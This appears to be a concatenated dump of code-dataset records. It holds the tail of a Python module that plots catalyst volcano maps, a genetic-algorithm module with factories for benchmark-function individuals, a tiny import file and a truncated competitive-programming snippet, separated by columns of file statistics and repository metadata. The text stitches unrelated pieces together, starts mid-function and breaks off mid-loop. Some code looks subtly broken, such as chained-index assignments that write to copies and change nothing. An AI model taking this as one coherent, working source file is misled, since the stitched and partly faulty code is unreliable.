if currmape < mape:
Xm[k, 1] = (
Ym[k] - reg.intercept_ - reg.coeff_[0] * X[k][0]
) / reg.coeff_[1]
d_refill[np.isnan(d).any(axis=1)][:, idx2][k] = Xm[k, 1]
mape = currmape
elif not np.isnan(Ym[k]) and not np.isnan(Xm[k, 1]):
if currmape < mape:
Xm[k, 0] = (
Ym[k] - reg.intercept_ - reg.coeff_[1] * X[k][1]
) / reg.coeff_[0]
d_refill[np.isnan(d).any(axis=1)][:, idx1][k] = Xm[k, 0]
mape = currmape
else:
raise MissingDataError(
"Both descriptor and regression target are undefined. This should have been fixed before this point. Exiting."
)
n = Y.size
m = p.size
dof = n - m
t = stats.t.ppf(0.95, dof)
resid = Y - Y_pred
chi2 = np.sum((resid / Y_pred) ** 2)
s_err = np.sqrt(np.sum(resid ** 2) / dof)
fig, ax = plt.subplots(
frameon=False, figsize=[3, 3], dpi=300, constrained_layout=True
)
yint = np.sort(Y_pred)
plot_ci_manual(t, s_err, n, X, xint, yint, ax=ax)
pi = (
t
* s_err
* np.sqrt(
1 + 1 / n + (xint - np.mean(X)) ** 2 / np.sum((X - np.mean(X)) ** 2)
)
)
ax.plot(xint, yint, "-", linewidth=1, color="#000a75", alpha=0.85)
for i in range(len(X)):
ax.scatter(
Y_pred[i],
Y[i],
s=12.5,
c=cbi[i],
marker=msi[i],
linewidths=0.15,
edgecolors="black",
)
# Border
ax.spines["top"].set_color("black")
ax.spines["bottom"].set_color("black")
ax.spines["left"].set_color("black")
ax.spines["right"].set_color("black")
ax.get_xaxis().set_tick_params(direction="out")
ax.get_yaxis().set_tick_params(direction="out")
ax.xaxis.tick_bottom()
ax.yaxis.tick_left()
# Labels and key
plt.xlabel(f"Function of {tag1} and {tag2}")
plt.ylabel(f"{tags[j]} [kcal/mol]")
plt.xlim(xmin, xmax)
plt.savefig(f"{tags[j]}.png")
return np.hstack((d_refill, d2))
def plot_3d_t_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="t"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
ridmax = np.zeros_like(gridj, dtype=int)
ridmin = np.zeros_like(gridj, dtype=int)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids][:-1]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l], ridmax[k, l], ridmin[k, l], diff = calc_s_es(
profile, dgr, esp=True
)
rid = np.hstack([ridmin, ridmax])
if verb > 0:
pass
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
dgr = d[i][-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = "-ΔG(pds) [kcal/mol]"
filename = f"t_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"t_volcano_{tag1}_{tag2}.csv"
print(f"Saving volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, -\D_pds",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def plot_3d_k_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
ridmax = np.zeros_like(gridj, dtype=int)
ridmin = np.zeros_like(gridj, dtype=int)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids][:-1]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l], ridmax[k, l], ridmin[k, l], diff = calc_s_es(
profile, dgr, esp=True
)
rid = np.hstack([ridmin, ridmax])
if verb > 0:
pass
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = "-ΔG(kds) [kcal/mol]"
filename = f"k_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"k_volcano_{tag1}_{tag2}.csv"
print(f"Saving volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, -\D_kds",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def plot_3d_es_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
ridmax = np.zeros_like(gridj, dtype=int)
ridmin = np.zeros_like(gridj, dtype=int)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids][:-1]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l], ridmax[k, l], ridmin[k, l], diff = calc_es(
profile, dgr, esp=True
)
rid = np.hstack([ridmin, ridmax])
if verb > 0:
pass
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = r"-δ$E$ [kcal/mol]"
filename = f"es_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"es_volcano_{tag1}_{tag2}.csv"
print(f"Saving volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, -\d_Ges",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def plot_3d_tof_volcano(
idx1,
idx2,
d,
tags,
coeff,
regress,
dgr,
T=298.15,
cb="white",
ms="o",
lmargin=15,
rmargin=15,
npoints=200,
plotmode=1,
verb=0,
):
x1base = 25
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
lnsteps = range(d.shape[1])
x1max = bround(X1.max() + rmargin, x1base)
x1min = bround(X1.min() - lmargin, x1base)
x2max = bround(X2.max() + rmargin, x2base)
x2min = bround(X2.min() - lmargin, x2base)
if verb > 1:
print(
f"Range of descriptors set to [ {x1min} , {x1max} ] and [ {x2min} , {x2max} ]"
)
xint = np.linspace(x1min, x1max, npoints)
yint = np.linspace(x2min, x2max, npoints)
grids = []
for i, j in enumerate(lnsteps):
XY = np.vstack([X1, X2, d[:, j]]).T
X = XY[:, :2]
Y = XY[:, 2]
reg = sk.linear_model.LinearRegression().fit(X, Y)
Y_pred = reg.predict(X)
gridj = np.zeros((npoints, npoints))
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
x1x2 = np.vstack([x1, x2]).reshape(1, -1)
gridj[k, l] = reg.predict(x1x2)
grids.append(gridj)
grid = np.zeros_like(gridj)
rb = np.zeros_like(gridj, dtype=int)
for k, x1 in enumerate(xint):
for l, x2 in enumerate(yint):
profile = [gridj[k, l] for gridj in grids]
dgr = [gridj[k, l] for gridj in grids][-1]
grid[k, l] = np.log10(calc_tof(profile, dgr, T, coeff, exact=True)[0])
ymin = grid.min()
ymax = grid.max()
px = np.zeros_like(d[:, 0])
py = np.zeros_like(d[:, 0])
for i in range(d.shape[0]):
profile = d[i, :-1]
px[i] = X1[i]
py[i] = X2[i]
x1label = f"{tag1} [kcal/mol]"
x2label = f"{tag2} [kcal/mol]"
ylabel = "log(TOF) [1/s]"
filename = f"tof_volcano_{tag1}_{tag2}.png"
if verb > 0:
csvname = f"tof_volcano_{tag1}_{tag2}.csv"
print(f"Saving TOF volcano data to file {csvname}")
x = np.zeros_like(grid.reshape(-1))
y = np.zeros_like(grid.reshape(-1))
for i, xy in enumerate(itertools.product(xint, yint)):
x[i] = xy[0]
y[i] = xy[1]
zdata = list(zip(x, y, grid.reshape(-1)))
np.savetxt(
csvname,
zdata,
fmt="%.4e",
delimiter=",",
header="Descriptor 1, Descriptor 2, log10(TOF)",
)
if plotmode == 2:
plot_3d_contour(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
else:
plot_3d_scatter(
xint,
yint,
grid.T,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label=x1label,
x2label=x2label,
ylabel=ylabel,
filename=filename,
cb=cb,
ms=ms,
plotmode=plotmode,
)
return xint, yint, grid, px, py
def beautify_ax(ax):
# Border
ax.spines["top"].set_color("black")
ax.spines["bottom"].set_color("black")
ax.spines["left"].set_color("black")
ax.spines["right"].set_color("black")
ax.get_xaxis().set_tick_params(direction="out")
ax.get_yaxis().set_tick_params(direction="out")
ax.xaxis.tick_bottom()
ax.yaxis.tick_left()
return ax
def plot_3d_contour(
xint,
yint,
grid,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label="X1-axis",
x2label="X2-axis",
ylabel="Y-axis",
filename="plot.png",
cb="white",
ms="o",
plotmode=2,
):
fig, ax = plt.subplots(
frameon=False, figsize=[4.2, 3], dpi=300, constrained_layout=True
)
grid = np.clip(grid, ymin, ymax)
norm = cm.colors.Normalize(vmax=ymax, vmin=ymin)
levels = np.arange(ymin - 5, ymax + 5, 2.5)
ax = beautify_ax(ax)
cset = ax.contourf(
xint,
yint,
grid,
levels=levels,
norm=norm,
cmap=cm.get_cmap("jet", len(levels)),
)
# Labels and key
plt.xlabel(x1label)
plt.ylabel(x2label)
plt.xlim(x1min, x1max)
plt.ylim(x2max, x2min)
plt.xticks(np.arange(x1min, x1max + 0.1, x1base))
plt.yticks(np.arange(x2min, x2max + 0.1, x2base))
ax.contour(xint, yint, grid, cset.levels, colors="black", linewidths=0.3)
fmt = lambda x, pos: "%.0f" % x
cbar = fig.colorbar(cset, format=FuncFormatter(fmt))
cbar.set_label(ylabel, labelpad=15, rotation=270)
for i in range(len(px)):
ax.scatter(
px[i],
py[i],
s=12.5,
c=cb[i],
marker=ms[i],
linewidths=0.15,
edgecolors="black",
)
plt.savefig(filename)
def plot_3d_scatter(
xint,
yint,
grid,
px,
py,
ymin,
ymax,
x1min,
x1max,
x2min,
x2max,
x1base,
x2base,
x1label="X1-axis",
x2label="X2-axis",
ylabel="Y-axis",
filename="plot.png",
cb="white",
ms="o",
plotmode=0,
):
fig, ax = plt.subplots(
frameon=False, figsize=[4.2, 3], dpi=300, constrained_layout=True
)
grid = np.clip(grid, ymin, ymax)
norm = cm.colors.Normalize(vmax=ymax, vmin=ymin)
ax = beautify_ax(ax)
cset = ax.imshow(
grid,
interpolation="antialiased",
extent=[x1min, x1max, x2min, x2max],
origin="lower",
cmap=cm.jet,
aspect="auto",
)
# Labels and key
plt.xlabel(x1label)
plt.ylabel(x2label)
plt.xlim(x1min, x1max)
plt.ylim(x2max, x2min)
plt.xticks(np.arange(x1min, x1max + 0.1, x1base))
plt.yticks(np.arange(x2min, x2max + 0.1, x2base))
fmt = lambda x, pos: "%.0f" % x
cbar = fig.colorbar(cset, format=FuncFormatter(fmt))
cbar.set_label(ylabel, labelpad=15, rotation=270)
if plotmode == 1:
for i in range(len(px)):
ax.scatter(
px[i],
py[i],
s=12.5,
c=cb[i],
marker=ms[i],
linewidths=0.15,
edgecolors="black",
)
plt.savefig(filename)
| 27.779097
| 130
| 0.489397
| 2,991
| 23,390
| 3.76329
| 0.105985
| 0.021766
| 0.030295
| 0.019901
| 0.824272
| 0.804371
| 0.78296
| 0.768479
| 0.751066
| 0.739339
| 0
| 0.046778
| 0.368448
| 23,390
| 841
| 131
| 27.812128
| 0.715204
| 0.005643
| 0
| 0.774074
| 0
| 0.004938
| 0.068095
| 0.00955
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012346
| false
| 0.003704
| 0.014815
| 0
| 0.037037
| 0.012346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a47295d63994429d1b7a4b6f05bba311a33b524a
| 11,252
|
py
|
Python
|
optimization/individual_factory.py
|
fberanizo/sin5006
|
96f7980b5ff61bd4af7852c9d733521edde540eb
|
[
"BSD-2-Clause"
] | null | null | null |
optimization/individual_factory.py
|
fberanizo/sin5006
|
96f7980b5ff61bd4af7852c9d733521edde540eb
|
[
"BSD-2-Clause"
] | null | null | null |
optimization/individual_factory.py
|
fberanizo/sin5006
|
96f7980b5ff61bd4af7852c9d733521edde540eb
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys, os
sys.path.insert(0, os.path.abspath('..'))
import ga, optimization, numpy, struct
def binary(num):
return ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', num))
class RastriginFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.RastriginFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are uniformly distributed over -5.0 and 5.0."""
genotype = numpy.random.uniform(low=-5.0, high=5.0, size=2)
fitness_evaluator = optimization.RastriginFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-5.0, high=5.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(RastriginFloatIndividualFactory)
class RastriginBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.RastriginBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-5.0, high=5.0, size=2))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.RastriginBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(RastriginBinaryIndividualFactory)
class XSquareFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XSquareFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x1,x2,...,x30] values are uniformly distributed over -100.0 and 100.0."""
genotype = numpy.random.uniform(low=-100.0, high=100.0, size=30)
fitness_evaluator = optimization.XSquareFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-100.0, high=100.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XSquareFloatIndividualFactory)
class XSquareBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XSquareBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-100.0, high=100.0, size=30))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.XSquareBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XSquareBinaryIndividualFactory)
class XAbsoluteSquareFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XAbsoluteSquareFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x1,x2,...,x30] values are uniformly distributed over -100.0 and 100.0."""
genotype = numpy.random.uniform(low=-100.0, high=100.0, size=30)
fitness_evaluator = optimization.XAbsoluteSquareFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-100.0, high=100.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XAbsoluteSquareFloatIndividualFactory)
class XAbsoluteSquareBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.XAbsoluteSquareBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-100.0, high=100.0, size=30))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.XAbsoluteSquareBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(XAbsoluteSquareBinaryIndividualFactory)
class SineXSquareRootFloatIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.SineXSquareRootFloatIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x1,x2,...,x30] values are uniformly distributed over -500.0 and 500.0."""
genotype = numpy.random.uniform(low=-500.0, high=500.0, size=30)
fitness_evaluator = optimization.SineXSquareRootFloatFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.uniform(low=-500.0, high=500.0)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(SineXSquareRootFloatIndividualFactory)
class SineXSquareRootBinaryIndividualFactory(ga.IndividualFactory):
def __init__(self, crossover_method='one_point', mutation_method='permutation'):
super(optimization.SineXSquareRootBinaryIndividualFactory, self).__init__()
self.crossover_method = crossover_method
if mutation_method == 'basic_mutation':
self.mutation_method = self.basic_mutation
else:
self.mutation_method = mutation_method
def create(self):
"""Creates individuals which [x,y] values are represented by 32 bits."""
genotype = map(binary, numpy.random.uniform(low=-500.0, high=500.0, size=30))
genotype = numpy.array(list("".join(genotype)), dtype=int)
fitness_evaluator = optimization.SineXSquareRootBinaryFitnessEvaluator()
return optimization.Individual(genotype, fitness_evaluator, self.crossover_method, self.mutation_method)
def basic_mutation(self_individual, individual):
"""Performs a basic mutation where one value in the chromosome is replaced by another valid value."""
idx = numpy.random.randint(0, len(individual.genotype))
value = numpy.random.randint(2)
numpy.put(individual.genotype, [idx], [value])
individual.fitness = individual.fitness_evaluator.evaluate(individual)
return individual
ga.IndividualFactory.register(SineXSquareRootBinaryIndividualFactory)
| 51.614679
| 112
| 0.721738
| 1,213
| 11,252
| 6.523495
| 0.093157
| 0.084924
| 0.057627
| 0.046506
| 0.834702
| 0.831669
| 0.825856
| 0.825856
| 0.825856
| 0.823581
| 0
| 0.017643
| 0.178902
| 11,252
| 218
| 113
| 51.614679
| 0.838835
| 0.127622
| 0
| 0.732919
| 0
| 0
| 0.028657
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15528
| false
| 0
| 0.012422
| 0.006211
| 0.322981
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f10e1d5aebeb460fb695a42cd276e7ea5488b448
| 92
|
py
|
Python
|
tabular/src/autogluon/tabular/utils/features/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
tabular/src/autogluon/tabular/utils/features/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
tabular/src/autogluon/tabular/utils/features/__init__.py
|
mseeger/autogluon-1
|
e8d82363ce07fd8e3087bcdd2d71c6f6bd8fd7a0
|
[
"Apache-2.0"
] | null | null | null |
from ...utils.features.feature_metadata import *
from ...utils.features.generators import *
| 30.666667
| 48
| 0.782609
| 11
| 92
| 6.454545
| 0.636364
| 0.253521
| 0.478873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 49
| 46
| 0.845238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f111109b53da4d95961dd04d64753c05cb7f332c
| 1,569
|
py
|
Python
|
break.py
|
Manthanc007/APS-2o2o
|
a84337c4e658a93b6c67515fa3ef59b09f2e5e94
|
[
"MIT"
] | null | null | null |
break.py
|
Manthanc007/APS-2o2o
|
a84337c4e658a93b6c67515fa3ef59b09f2e5e94
|
[
"MIT"
] | null | null | null |
break.py
|
Manthanc007/APS-2o2o
|
a84337c4e658a93b6c67515fa3ef59b09f2e5e94
|
[
"MIT"
] | null | null | null |
from sys import stdin, stdout
t,s=map(int,input().split())
if(s==1):
while(t>0):
t=t-1
n=int(stdin.readline())
a=[int(x) for x in stdin.readline().split()]
b=[int(x) for x in stdin.readline().split()]
a.sort()
b.sort()
l=set()
l.add(a[0])
count=0
for i in range(0,n):
